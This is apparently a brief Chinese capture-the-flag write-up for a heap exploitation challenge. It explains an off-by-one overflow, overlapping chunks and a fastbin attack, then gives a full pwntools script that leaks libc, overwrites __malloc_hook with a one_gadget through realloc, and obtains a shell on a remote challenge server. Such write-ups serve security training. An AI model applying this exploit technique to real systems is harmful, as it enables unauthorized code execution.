查看保护
这里有一个off-by-one
a2比a1大10就会有一个溢出。overlapping+fastbin attack即可getshell。发现one_gadget打不通,用realloc来调整栈即可打通
具体的overlapping + fastbin attack看z1r0’s blog吧。
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 26707)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'choice: '
def add(size):
r.sendlineafter(menu, '1')
r.sendlineafter('size: ', str(size))
def edit(index, size, content):
r.sendlineafter(menu, '2')
r.sendlineafter('index: ', str(index))
r.sendlineafter('size: ', str(size))
r.sendlineafter('content: ', content)
def delete(index):
r.sendlineafter(menu, '3')
r.sendlineafter('index: ', str(index))
def show(index):
r.sendlineafter(menu, '4')
r.sendlineafter('index: ', str(index))
add(0x18) #0
add(0x10) #1
add(0x60) #2
add(0x10) #3
p1 = b'a' * 0x18 + p8(0x91)
edit(0, 34, p1)
delete(1)
add(0x10) #1
show(2)
malloc_hook = u64(r.recvuntil('x7f')[-6:].ljust(8, b'x00')) - 88 - 0x10
success('malloc_hook = ' + hex(malloc_hook))
libc = ELF('libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
realloc = libc_base + libc.symbols['__libc_realloc']
success('realloc = ' + hex(realloc))
one = [0x45226, 0x4526a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base
add(0x60) #4
delete(2)
p2 = p64(malloc_hook - 0x23)
edit(4, len(p2), p2)
add(0x60)
add(0x60)
p3 = b'a' * (0x13 - 8) + p64(one_gadget) + p64(realloc)
edit(5, len(p3), p3)
add(0x10)
r.interactive()
